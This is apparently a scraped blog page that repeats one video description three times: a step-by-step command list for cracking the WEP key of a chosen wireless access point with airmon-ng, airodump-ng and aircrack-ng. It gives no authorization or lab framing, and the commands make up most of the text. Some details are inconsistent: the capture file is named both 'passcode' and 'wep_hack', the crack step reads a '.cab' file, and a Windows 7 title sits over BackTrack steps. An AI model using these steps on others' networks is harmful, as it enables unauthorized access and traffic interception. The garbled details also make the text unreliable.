THIS VIDEO IS TO SHOW HOW TO CRACK WEP (THE BASIC STEPS) ENABLED WIRELESS NETWORK VMWARE:downloads.vmware.com BACKTRACK: www.backtrack-linux.org COMMANDS USED airmon-ng (Shows connected network adapters/devices) airodump-ng wlan0 (Shows available networks on the wlan0 network adapter - Your network adapter name may differ) airodump-ng -C 6 --bssid XX:XX:XX:XX:XX:XX -w wep_hack wlan0 (Writes intercepted/sniffed IV's to a CAP document called passcode. The bssid specifies the Mac Address of the Access Point you are wanting to crack so the Mac Address should differ from what I use. The Channel may also differ depending on what's displayed for you. Same goes for the network adapter) dir (Shows files in the current directory) aircrack-ng -a 1 -b XX:XX:XX:XX:XX:XX wep_hack.cab (Cracks the IV's in the Cab file created via the airodump-ng command. The Mac Address specified should be that of the Access Point your trying to crack)
HOW TO CRACK WEP(windows7)
HOW TO CRACK WEP(windows7) Tube. Duration : 4.63 Mins.
THIS VIDEO IS TO SHOW HOW TO CRACK WEP (THE BASIC STEPS) ENABLED WIRELESS NETWORK VMWARE:downloads.vmware.com BACKTRACK: www.backtrack-linux.org COMMANDS USED airmon-ng (Shows connected network adapters/devices) airodump-ng wlan0 (Shows available networks on the wlan0 network adapter - Your network adapter name may differ) airodump-ng -C 6 --bssid XX:XX:XX:XX:XX:XX -w wep_hack wlan0 (Writes intercepted/sniffed IV's to a CAP document called passcode. The bssid specifies the Mac Address of the Access Point you are wanting to crack so the Mac Address should differ from what I use. The Channel may also differ depending on what's displayed for you. Same goes for the network adapter) dir (Shows files in the current directory) aircrack-ng -a 1 -b XX:XX:XX:XX:XX:XX wep_hack.cab (Cracks the IV's in the Cab file created via the airodump-ng command. The Mac Address specified should be that of the Access Point your trying to crack)
THIS VIDEO IS TO SHOW HOW TO CRACK WEP (THE BASIC STEPS) ENABLED WIRELESS NETWORK VMWARE:downloads.vmware.com BACKTRACK: www.backtrack-linux.org COMMANDS USED airmon-ng (Shows connected network adapters/devices) airodump-ng wlan0 (Shows available networks on the wlan0 network adapter - Your network adapter name may differ) airodump-ng -C 6 --bssid XX:XX:XX:XX:XX:XX -w wep_hack wlan0 (Writes intercepted/sniffed IV's to a CAP document called passcode. The bssid specifies the Mac Address of the Access Point you are wanting to crack so the Mac Address should differ from what I use. The Channel may also differ depending on what's displayed for you. Same goes for the network adapter) dir (Shows files in the current directory) aircrack-ng -a 1 -b XX:XX:XX:XX:XX:XX wep_hack.cab (Cracks the IV's in the Cab file created via the airodump-ng command. The Mac Address specified should be that of the Access Point your trying to crack)
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment